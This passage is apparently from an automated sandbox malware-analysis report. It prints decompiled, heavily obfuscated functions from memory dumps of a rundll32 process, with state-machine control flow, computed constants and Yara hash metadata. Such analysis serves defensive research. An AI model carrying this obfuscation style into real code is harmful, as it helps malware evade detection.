				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				void* _t171;
				void* _t195;
				void* _t196;
				signed int* _t199;

				_push(_a8);
				_t195 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t140);
				_v108 = 0xfc4f;
				_t199 =  &(( &_v116)[4]);
				_v108 = _v108 | 0x4da9a639;
				_v108 = _v108 + 0x67dc;
				_t196 = 0;
				_v108 = _v108 << 0xc;
				_t171 = 0x2e363e63;
				_v108 = _v108 ^ 0xa6659d9d;
				_v72 = 0xf402;
				_v72 = _v72 ^ 0x5f9ae956;
				_v72 = _v72 ^ 0x5f9a291f;
				_v112 = 0xe152;
				_v112 = _v112 | 0xaffcdffa;
				_t163 = 0x1d;
				_v112 = _v112 / _t163;
				_v112 = _v112 ^ 0x0611b87a;
				_v116 = 0x6c25;
				_v116 = _v116 ^ 0x0c91b378;
				_v116 = _v116 + 0x2f8;
				_v116 = _v116 | 0x69d7e26c;
				_v116 = _v116 ^ 0x6dd79b31;
				_v104 = 0x7ef1;
				_v104 = _v104 + 0xffff4bb2;
				_t164 = 0x4f;
				_v104 = _v104 / _t164;
				_t165 = 0x4d;
				_v104 = _v104 / _t165;
				_v104 = _v104 ^ 0x000acb92;
				_v88 = 0xf338;
				_t166 = 0x31;
				_v88 = _v88 / _t166;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x00001bb8;
				_v100 = 0x39ac;
				_v100 = _v100 >> 5;
				_t167 = 0x6a;
				_v100 = _v100 * 0x73;
				_v100 = _v100 + 0xffffcfed;
				_v100 = _v100 ^ 0x0000c292;
				_v84 = 0xa231;
				_v84 = _v84 + 0x99eb;
				_v84 = _v84 / _t167;
				_v84 = _v84 ^ 0x000046d3;
				_v76 = 0xf128;
				_v76 = _v76 + 0xffff9193;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0x00001e23;
				_v92 = 0x62a3;
				_t168 = 0x33;
				_v92 = _v92 / _t168;
				_v92 = _v92 ^ 0x5bc1cdff;
				_v92 = _v92 + 0xffff8115;
				_v92 = _v92 ^ 0x5bc105bf;
				_v80 = 0x9d4f;
				_v80 = _v80 << 0xf;
				_v80 = _v80 + 0xffff2359;
				_v80 = _v80 ^ 0x4ea6cb3e;
				_v96 = 0x4976;
				_v96 = _v96 + 0x63d7;
				_v96 = _v96 + 0xf4f6;
				_v96 = _v96 + 0xffffaa83;
				_v96 = _v96 ^ 0x00013bfc;
				do {
					while(_t171 != 0xc31af3f) {
						if(_t171 == 0x1ee6df64) {
							_t157 = E01FFBAA2( &_v68, _v104, _v88, _t195);
							_t199 =  &(_t199[2]);
							__eflags = _t157;
							if(__eflags != 0) {
								_t171 = 0xc31af3f;
								continue;
							}
						} else {
							if(_t171 == 0x1ee95fdc) {
								E01FFFEE3(_a8,  &_v68, _v108, _v72, _v112, _v116);
								_t199 =  &(_t199[4]);
								_t171 = 0x1ee6df64;
								continue;
							} else {
								if(_t171 == 0x2c795783) {
									_t136 = _t195 + 8; // 0x301e42
									__eflags = E01FFF914(_v76, _v92, __eflags, _v80, _t136, _v96,  &_v68);
									_t196 =  !=  ? 1 : _t196;
								} else {
									if(_t171 != 0x2e363e63) {
										goto L13;
									} else {
										_t171 = 0x1ee95fdc;
										continue;
									}
								}
							}
						}
						L16:
						return _t196;
					}
					_t130 = _t195 + 4; // 0x301e3e
					_t156 = E01FFBAA2( &_v68, _v100, _v84, _t130);
					_t199 =  &(_t199[2]);
					__eflags = _t156;
					if(__eflags == 0) {
						_t171 = 0x26c6c5b0;
						goto L13;
					} else {
						_t171 = 0x2c795783;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t171 - 0x26c6c5b0;
				} while (__eflags != 0);
				goto L16;
			}





























                                                                      0x01ffbe7b
                                                                      0x01ffbe82
                                                                      0x01ffbe84
                                                                      0x01ffbe8b
                                                                      0x01ffbe8c
                                                                      0x01ffbe8d
                                                                      0x01ffbe92
                                                                      0x01ffbe9a
                                                                      0x01ffbe9d
                                                                      0x01ffbea7
                                                                      0x01ffbeaf
                                                                      0x01ffbeb1
                                                                      0x01ffbeb6
                                                                      0x01ffbebb
                                                                      0x01ffbec3
                                                                      0x01ffbecb
                                                                      0x01ffbed3
                                                                      0x01ffbedb
                                                                      0x01ffbee3
                                                                      0x01ffbef1
                                                                      0x01ffbef6
                                                                      0x01ffbefc
                                                                      0x01ffbf04
                                                                      0x01ffbf0c
                                                                      0x01ffbf14
                                                                      0x01ffbf1c
                                                                      0x01ffbf24
                                                                      0x01ffbf2c
                                                                      0x01ffbf34
                                                                      0x01ffbf40
                                                                      0x01ffbf45
                                                                      0x01ffbf4f
                                                                      0x01ffbf54
                                                                      0x01ffbf5a
                                                                      0x01ffbf62
                                                                      0x01ffbf6e
                                                                      0x01ffbf73
                                                                      0x01ffbf79
                                                                      0x01ffbf7e
                                                                      0x01ffbf86
                                                                      0x01ffbf8e
                                                                      0x01ffbf98
                                                                      0x01ffbf99
                                                                      0x01ffbf9d
                                                                      0x01ffbfa5
                                                                      0x01ffbfad
                                                                      0x01ffbfb5
                                                                      0x01ffbfc3
                                                                      0x01ffbfc7
                                                                      0x01ffbfcf
                                                                      0x01ffbfd7
                                                                      0x01ffbfdf
                                                                      0x01ffbfe4
                                                                      0x01ffbfee
                                                                      0x01ffbffc
                                                                      0x01ffc009
                                                                      0x01ffc00d
                                                                      0x01ffc015
                                                                      0x01ffc01d
                                                                      0x01ffc025
                                                                      0x01ffc02d
                                                                      0x01ffc032
                                                                      0x01ffc03a
                                                                      0x01ffc042
                                                                      0x01ffc04a
                                                                      0x01ffc052
                                                                      0x01ffc05a
                                                                      0x01ffc062
                                                                      0x01ffc06a
                                                                      0x01ffc06a
                                                                      0x01ffc074
                                                                      0x01ffc0c9
                                                                      0x01ffc0ce
                                                                      0x01ffc0d1
                                                                      0x01ffc0d3
                                                                      0x01ffc0d5
                                                                      0x00000000
                                                                      0x01ffc0d5
                                                                      0x01ffc076
                                                                      0x01ffc078
                                                                      0x01ffc0ad
                                                                      0x01ffc0b2
                                                                      0x01ffc0b5
                                                                      0x00000000
                                                                      0x01ffc07a
                                                                      0x01ffc080
                                                                      0x01ffc11b
                                                                      0x01ffc136
                                                                      0x01ffc138
                                                                      0x01ffc086
                                                                      0x01ffc08c
                                                                      0x00000000
                                                                      0x01ffc08e
                                                                      0x01ffc08e
                                                                      0x00000000
                                                                      0x01ffc08e
                                                                      0x01ffc08c
                                                                      0x01ffc080
                                                                      0x01ffc078
                                                                      0x01ffc13c
                                                                      0x01ffc144
                                                                      0x01ffc144
                                                                      0x01ffc0d9
                                                                      0x01ffc0e9
                                                                      0x01ffc0ee
                                                                      0x01ffc0f1
                                                                      0x01ffc0f3
                                                                      0x01ffc0ff
                                                                      0x00000000
                                                                      0x01ffc0f5
                                                                      0x01ffc0f5
                                                                      0x00000000
                                                                      0x01ffc0f5
                                                                      0x00000000
                                                                      0x01ffc104
                                                                      0x01ffc104
                                                                      0x01ffc104
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %l$c>6.$c>6.$vI
                                                                      • API String ID: 0-1842334051
                                                                      • Opcode ID: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
                                                                      • Instruction ID: 3fdc9dbab67d17d74a7f98879248cfca7cd5424279692a122abe4376599a9c9f
                                                                      • Opcode Fuzzy Hash: e35383a8ff9d3873cfa8fad072e536b5cf3e084f98ebf9b090aa7fc1caa2cc9a
                                                                      • Instruction Fuzzy Hash: 64717A72508341DBE354CF25C88581BBBE1FFD8758F404A2DF6CA96160D3B6CA1ACB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00240604, Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M$c$YGO$kb
                                                                      • API String ID: 0-1506048532
                                                                      • Opcode ID: f3918612a07dbf820744b97fdc2a3ffe60349661cd5382ba9ec48ca095532492
                                                                      • Instruction ID: 77cf14b288af43b7c78a855ce484ea297be23309c4ac81b24ee42e02cdd983ae
                                                                      • Opcode Fuzzy Hash: f3918612a07dbf820744b97fdc2a3ffe60349661cd5382ba9ec48ca095532492
                                                                      • Instruction Fuzzy Hash: 167154B11083819FD358CF65C88991FBBF1FBC5748F404A1DF28596260D3BACA598F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023B3E8, Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %l$c>6.$c>6.$vI
                                                                      • API String ID: 0-1842334051
                                                                      • Opcode ID: 24a708c09509732ed6a1976b4a33833c542d2d2f6f4fa2fdc461646d9a68ae0e
                                                                      • Instruction ID: 36198619501343b6fa6cf13d640ef466a8f0d638fb2eb081c882cdad65654a8e
                                                                      • Opcode Fuzzy Hash: 24a708c09509732ed6a1976b4a33833c542d2d2f6f4fa2fdc461646d9a68ae0e
                                                                      • Instruction Fuzzy Hash: 047199B25083419BD794CF21C88691FBBE1FBD8758F500A1DF589962A0D375CA29CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00243D29, Relevance: 5.1, Strings: 4, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *Bl$>4$Z`$x[
                                                                      • API String ID: 0-788090992
                                                                      • Opcode ID: 36f0ac18098e83fdd7a7180336d11f300c49605d38501b2fd70b3092a2ba1ae5
                                                                      • Instruction ID: d7bd946ab7ac8258fdf0702e38ca63276ffa16c984d6eabc9d1d127f37a784ed
                                                                      • Opcode Fuzzy Hash: 36f0ac18098e83fdd7a7180336d11f300c49605d38501b2fd70b3092a2ba1ae5
                                                                      • Instruction Fuzzy Hash: DB511FB1C0130EABDF58CFE1D98A4EEBBB1FB08314F208158E515762A0D3B94A59CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF9D2F, Relevance: 3.9, Strings: 3, Instructions: 197COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E01FF9D2F(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr* _t178;
				intOrPtr _t188;
				intOrPtr _t189;
				signed int _t191;
				intOrPtr _t195;
				intOrPtr _t196;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				void* _t221;
				signed int _t222;
				intOrPtr _t223;
				intOrPtr _t224;
				signed int* _t225;

				_t189 = __ecx;
				_t225 =  &_v84;
				_v8 = __edx;
				_v24 = __ecx;
				_v84 = 0x52c3;
				_v84 = _v84 + 0xffffa290;
				_t221 = 0x1b1ec7af;
				_v20 = _v20 & 0x00000000;
				_t215 = 0x28;
				_v84 = _v84 / _t215;
				_v84 = _v84 ^ 0xc70a2cbb;
				_v84 = _v84 ^ 0xc16c29fd;
				_v60 = 0xef49;
				_t216 = 0x4f;
				_v60 = _v60 / _t216;
				_v60 = _v60 + 0x8f43;
				_v60 = _v60 ^ 0x0000e631;
				_v52 = 0xdf8d;
				_v52 = _v52 | 0x89b2267c;
				_v52 = _v52 ^ 0x13e61697;
				_v52 = _v52 ^ 0x9a54c391;
				_v80 = 0xa7ea;
				_v80 = _v80 >> 2;
				_v80 = _v80 + 0xffff1a0f;
				_v80 = _v80 ^ 0xf694800b;
				_v80 = _v80 ^ 0x096bf198;
				_v56 = 0x4df7;
				_t217 = 0x58;
				_v56 = _v56 * 0x24;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x00005064;
				_v44 = 0x5793;
				_v44 = _v44 << 3;
				_v44 = _v44 | 0x1a78ccf0;
				_v44 = _v44 ^ 0x1a7ad28a;
				_v48 = 0x4fde;
				_v48 = _v48 / _t217;
				_v48 = _v48 * 0x14;
				_v48 = _v48 ^ 0x0000583a;
				_v32 = 0x8af0;
				_v32 = _v32 + 0xffff32af;
				_v32 = _v32 ^ 0xffffb04c;
				_v36 = 0x75dd;
				_v36 = _v36 + 0x1ee0;
				_v36 = _v36 ^ 0x0000d042;
				_v72 = 0x8173;
				_v72 = _v72 ^ 0xf613a128;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 | 0xdda636e2;
				_v72 = _v72 ^ 0xddbe8dc6;
				_v76 = 0xe20a;
				_v76 = _v76 * 0x6c;
				_v76 = _v76 << 0xc;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x0000f2d9;
				_v64 = 0x5aba;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x995ec148;
				_v64 = _v64 + 0xffffc53f;
				_v64 = _v64 ^ 0x9955459c;
				_v68 = 0xe247;
				_v68 = _v68 ^ 0xa76713ca;
				_t218 = 0x3b;
				_t224 = _v8;
				_t219 = _v4;
				_t188 = _v8;
				_v68 = _v68 / _t218;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0002c308;
				_v40 = 0xd4fd;
				_v40 = _v40 * 0x1a;
				_v40 = _v40 ^ 0x6afb2fbd;
				_v40 = _v40 ^ 0x6aee8e0f;
				_t174 = _v28;
				L1:
				while(1) {
					do {
						while(_t221 != 0x145613b1) {
							if(_t221 == 0x146a35d3) {
								_t219 = 0x10000;
								_push(_t189);
								_t174 = E01FF54FB(0x10000);
								_t188 = _t174;
								if(_t188 != 0) {
									_v28 = _t174;
									_t224 = 0x10000;
									L7:
									_t189 = _v24;
									_t221 = 0x145613b1;
									continue;
								}
							} else {
								if(_t221 != 0x1b1ec7af) {
									goto L15;
								} else {
									_t221 = 0x146a35d3;
									continue;
								}
							}
							goto L16;
						}
						_t191 = E020034DA(_v52,  &_v16, _v80, _v56, _t224, _t174, _t189);
						_t225 =  &(_t225[5]);
						_v20 = _t191;
						if(_t191 == 0) {
							L14:
							_t189 = _v24;
							_t221 = 0x2a69df6d;
							goto L15;
						} else {
							_t195 = _v16;
							if(_t195 == 0) {
								goto L14;
							} else {
								_t174 = _v28 + _t195;
								_v28 = _v28 + _t195;
								_t224 = _t224 - _t195;
								if(_t224 != 0) {
									goto L7;
								} else {
									_t196 = _t219 + _t219;
									_push(_t196);
									_v12 = _t196;
									_t223 = E01FF54FB(_t196);
									if(_t223 != 0) {
										E01FF6374(_v32, _t223, _t219, _t188, _v36);
										E01FFDE81(_v72, _t188, _v76);
										_t224 = _t219;
										_t174 = _t223 + _t219;
										_t219 = _v12;
										_t225 =  &(_t225[4]);
										_v28 = _t174;
										_t188 = _t223;
										if(_t224 != 0) {
											goto L7;
										}
									}
								}
							}
						}
						break;
						L15:
						_t174 = _v28;
					} while (_t221 != 0x2a69df6d);
					L16:
					_t222 = _v20;
					if(_t222 != 0) {
						_t178 = _v8;
						 *_t178 = _t188;
						 *((intOrPtr*)(_t178 + 4)) = _t219 - _t224;
					} else {
						E01FFDE81(_v64, _t188, _v68);
					}
					return _t222;
				}
			}








































                                                                      0x01ff9d2f
                                                                      0x01ff9d2f
                                                                      0x01ff9d36
                                                                      0x01ff9d3a
                                                                      0x01ff9d3e
                                                                      0x01ff9d46
                                                                      0x01ff9d52
                                                                      0x01ff9d5b
                                                                      0x01ff9d60
                                                                      0x01ff9d65
                                                                      0x01ff9d6b
                                                                      0x01ff9d73
                                                                      0x01ff9d7b
                                                                      0x01ff9d87
                                                                      0x01ff9d8c
                                                                      0x01ff9d92
                                                                      0x01ff9d9a
                                                                      0x01ff9da2
                                                                      0x01ff9daa
                                                                      0x01ff9db2
                                                                      0x01ff9dba
                                                                      0x01ff9dc2
                                                                      0x01ff9dca
                                                                      0x01ff9dcf
                                                                      0x01ff9dd7
                                                                      0x01ff9ddf
                                                                      0x01ff9de7
                                                                      0x01ff9df4
                                                                      0x01ff9df5
                                                                      0x01ff9df9
                                                                      0x01ff9dfe
                                                                      0x01ff9e06
                                                                      0x01ff9e0e
                                                                      0x01ff9e13
                                                                      0x01ff9e1b
                                                                      0x01ff9e23
                                                                      0x01ff9e31
                                                                      0x01ff9e3a
                                                                      0x01ff9e3e
                                                                      0x01ff9e46
                                                                      0x01ff9e4e
                                                                      0x01ff9e56
                                                                      0x01ff9e5e
                                                                      0x01ff9e66
                                                                      0x01ff9e6e
                                                                      0x01ff9e76
                                                                      0x01ff9e7e
                                                                      0x01ff9e86
                                                                      0x01ff9e8b
                                                                      0x01ff9e93
                                                                      0x01ff9e9b
                                                                      0x01ff9ea8
                                                                      0x01ff9eac
                                                                      0x01ff9eb1
                                                                      0x01ff9eb6
                                                                      0x01ff9ebe
                                                                      0x01ff9ec6
                                                                      0x01ff9ecb
                                                                      0x01ff9ed3
                                                                      0x01ff9edb
                                                                      0x01ff9ee3
                                                                      0x01ff9eeb
                                                                      0x01ff9efb
                                                                      0x01ff9efe
                                                                      0x01ff9f02
                                                                      0x01ff9f06
                                                                      0x01ff9f0a
                                                                      0x01ff9f0e
                                                                      0x01ff9f13
                                                                      0x01ff9f1b
                                                                      0x01ff9f28
                                                                      0x01ff9f2c
                                                                      0x01ff9f34
                                                                      0x01ff9f3c
                                                                      0x00000000
                                                                      0x01ff9f40
                                                                      0x01ff9f40
                                                                      0x01ff9f40
                                                                      0x01ff9f4e
                                                                      0x01ff9f67
                                                                      0x01ff9f72
                                                                      0x01ff9f73
                                                                      0x01ff9f78
                                                                      0x01ff9f7d
                                                                      0x01ff9f83
                                                                      0x01ff9f87
                                                                      0x01ff9f89
                                                                      0x01ff9f89
                                                                      0x01ff9f8d
                                                                      0x00000000
                                                                      0x01ff9f8d
                                                                      0x01ff9f50
                                                                      0x01ff9f56
                                                                      0x00000000
                                                                      0x01ff9f5c
                                                                      0x01ff9f5c
                                                                      0x00000000
                                                                      0x01ff9f5c
                                                                      0x01ff9f56
                                                                      0x00000000
                                                                      0x01ff9f4e
                                                                      0x01ff9fac
                                                                      0x01ff9fae
                                                                      0x01ff9fb1
                                                                      0x01ff9fb7
                                                                      0x01ffa028
                                                                      0x01ffa028
                                                                      0x01ffa02c
                                                                      0x00000000
                                                                      0x01ff9fb9
                                                                      0x01ff9fb9
                                                                      0x01ff9fbf
                                                                      0x00000000
                                                                      0x01ff9fc1
                                                                      0x01ff9fc5
                                                                      0x01ff9fc7
                                                                      0x01ff9fcb
                                                                      0x01ff9fcd
                                                                      0x00000000
                                                                      0x01ff9fcf
                                                                      0x01ff9fd3
                                                                      0x01ff9fdc
                                                                      0x01ff9fdd
                                                                      0x01ff9fe6
                                                                      0x01ff9feb
                                                                      0x01ff9ff9
                                                                      0x01ffa008
                                                                      0x01ffa00d
                                                                      0x01ffa00f
                                                                      0x01ffa012
                                                                      0x01ffa016
                                                                      0x01ffa019
                                                                      0x01ffa01d
                                                                      0x01ffa021
                                                                      0x00000000
                                                                      0x01ffa023
                                                                      0x01ffa021
                                                                      0x01ff9feb
                                                                      0x01ff9fcd
                                                                      0x01ff9fbf
                                                                      0x00000000
                                                                      0x01ffa031
                                                                      0x01ffa031
                                                                      0x01ffa035
                                                                      0x01ffa041
                                                                      0x01ffa041
                                                                      0x01ffa047
                                                                      0x01ffa05f
                                                                      0x01ffa065
                                                                      0x01ffa067
                                                                      0x01ffa049
                                                                      0x01ffa053
                                                                      0x01ffa05c
                                                                      0x01ffa073
                                                                      0x01ffa073

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :X$G$dP
                                                                      • API String ID: 0-1717702412
                                                                      • Opcode ID: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction ID: fd880a5faeb225042d5082e5bc313f4c5d35fd8cb4c050488a13d5f2a77c8c44
                                                                      • Opcode Fuzzy Hash: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction Fuzzy Hash: 189131716093418FD358CF29C48541BFBE1BFC4758F408A1DF696A72A1C7B6DA498F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002392A3, Relevance: 3.9, Strings: 3, Instructions: 197COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :X$G$dP
                                                                      • API String ID: 0-1717702412
                                                                      • Opcode ID: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction ID: 03f4a2db10d5bf134848d397056bb17967e116aab67a18051ecc094d6adbcac7
                                                                      • Opcode Fuzzy Hash: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
                                                                      • Instruction Fuzzy Hash: 089141B16093428FD358CF29C48540BFBE1BBC5758F808A1EF59697261C7B9DA498F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200135B, Relevance: 3.9, Strings: 3, Instructions: 158COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E0200135B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t142;
				void* _t164;
				void* _t167;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t188;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t142);
				_v68 = 0xf6fd;
				_t188 =  &(( &_v68)[5]);
				_t185 = 0;
				_t167 = 0x120b6438;
				_t181 = 0x37;
				_v68 = _v68 / _t181;
				_t182 = 6;
				_v68 = _v68 * 0x52;
				_v68 = _v68 + 0xcd83;
				_v68 = _v68 ^ 0x00023d8c;
				_v12 = 0xd60a;
				_v12 = _v12 + 0xd6ec;
				_v12 = _v12 ^ 0x0001acf7;
				_v32 = 0xa29f;
				_v32 = _v32 ^ 0x4f38ff35;
				_v32 = _v32 ^ 0x0f385daa;
				_v40 = 0xdb0c;
				_v40 = _v40 << 0xc;
				_v40 = _v40 | 0xd75e623d;
				_v40 = _v40 ^ 0x9ffee23d;
				_v48 = 0x5711;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 + 0x4c96;
				_v48 = _v48 ^ 0x0000622c;
				_v28 = 0x2a8d;
				_v28 = _v28 ^ 0x2576f3ca;
				_v28 = _v28 ^ 0x2576c47f;
				_v52 = 0x1d31;
				_v52 = _v52 | 0x18ed216c;
				_v52 = _v52 * 0x26;
				_v52 = _v52 ^ 0xb3370705;
				_v36 = 0x506d;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x0000af41;
				_v56 = 0xd618;
				_v56 = _v56 + 0x2bfb;
				_v56 = _v56 / _t182;
				_v56 = _v56 ^ 0x00007f84;
				_v20 = 0x7a02;
				_v20 = _v20 + 0xffff09b4;
				_v20 = _v20 ^ 0xffffb01c;
				_v24 = 0x46f3;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x11bc9893;
				_v60 = 0xd2ca;
				_v60 = _v60 | 0xbe7a55a5;
				_v60 = _v60 << 8;
				_v60 = _v60 + 0xffffc5fa;
				_v60 = _v60 ^ 0x7ad789b6;
				_v8 = 0x5705;
				_v8 = _v8 + 0xffff783c;
				_v8 = _v8 ^ 0xfffff995;
				_v64 = 0x2f3b;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x79a7;
				_t183 = 0x7a;
				_v64 = _v64 / _t183;
				_v64 = _v64 ^ 0x00001190;
				_v16 = 0x22f9;
				_v16 = _v16 | 0x259e41a8;
				_v16 = _v16 ^ 0x259e7296;
				_v44 = 0x5159;
				_v44 = _v44 | 0xb37bb685;
				_v44 = _v44 ^ 0x9f6900dd;
				_v44 = _v44 ^ 0x2c12c002;
				while(_t167 != 0x120b6438) {
					if(_t167 == 0x257cf60e) {
						E01FF4282(_v60, _v8, _v64, _a8, _t185, _v40 | _v12,  &_v4, _v16, _v44, _a4);
					} else {
						if(_t167 == 0x2df92bb4) {
							_push(_t167);
							_t185 = E01FF54FB(_v4 + _v4);
							if(_t185 != 0) {
								_t167 = 0x257cf60e;
								continue;
							}
						} else {
							if(_t167 != 0x39df0674) {
								L10:
								if(_t167 != 0x1bf2cd07) {
									continue;
								} else {
								}
							} else {
								_t164 = E01FF4282(_v48, _v28, _v52, _a8, 0, _v32 | _v68,  &_v4, _v36, _v56, _a4);
								_t188 =  &(_t188[8]);
								if(_t164 != 0) {
									_t167 = 0x2df92bb4;
									continue;
								}
							}
						}
					}
					return _t185;
				}
				_t167 = 0x39df0674;
				goto L10;
			}




























                                                                      0x02001362
                                                                      0x02001366
                                                                      0x0200136a
                                                                      0x0200136e
                                                                      0x0200136f
                                                                      0x02001370
                                                                      0x02001375
                                                                      0x0200137d
                                                                      0x02001386
                                                                      0x02001388
                                                                      0x0200138f
                                                                      0x02001394
                                                                      0x0200139f
                                                                      0x020013a2
                                                                      0x020013a6
                                                                      0x020013ae
                                                                      0x020013b6
                                                                      0x020013be
                                                                      0x020013c6
                                                                      0x020013ce
                                                                      0x020013d6
                                                                      0x020013de
                                                                      0x020013e6
                                                                      0x020013ee
                                                                      0x020013f3
                                                                      0x020013fb
                                                                      0x02001403
                                                                      0x0200140b
                                                                      0x02001410
                                                                      0x02001418
                                                                      0x02001420
                                                                      0x02001428
                                                                      0x02001430
                                                                      0x02001438
                                                                      0x02001440
                                                                      0x0200144d
                                                                      0x02001451
                                                                      0x02001459
                                                                      0x02001461
                                                                      0x02001465
                                                                      0x0200146d
                                                                      0x02001475
                                                                      0x02001485
                                                                      0x02001489
                                                                      0x02001491
                                                                      0x02001499
                                                                      0x020014a1
                                                                      0x020014a9
                                                                      0x020014b1
                                                                      0x020014b6
                                                                      0x020014be
                                                                      0x020014c6
                                                                      0x020014ce
                                                                      0x020014d3
                                                                      0x020014db
                                                                      0x020014e3
                                                                      0x020014eb
                                                                      0x020014f3
                                                                      0x020014fb
                                                                      0x02001503
                                                                      0x02001508
                                                                      0x02001514
                                                                      0x02001517
                                                                      0x0200151b
                                                                      0x02001528
                                                                      0x02001535
                                                                      0x02001542
                                                                      0x0200154a
                                                                      0x02001552
                                                                      0x0200155a
                                                                      0x02001562
                                                                      0x0200156a
                                                                      0x02001574
                                                                      0x02001611
                                                                      0x02001576
                                                                      0x02001578
                                                                      0x020015c6
                                                                      0x020015cf
                                                                      0x020015d4
                                                                      0x020015d6
                                                                      0x00000000
                                                                      0x020015d6
                                                                      0x0200157a
                                                                      0x0200157c
                                                                      0x020015dc
                                                                      0x020015e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020015e4
                                                                      0x0200157e
                                                                      0x020015aa
                                                                      0x020015af
                                                                      0x020015b4
                                                                      0x020015b6
                                                                      0x00000000
                                                                      0x020015b6
                                                                      0x020015b4
                                                                      0x0200157c
                                                                      0x02001578
                                                                      0x02001622
                                                                      0x02001622
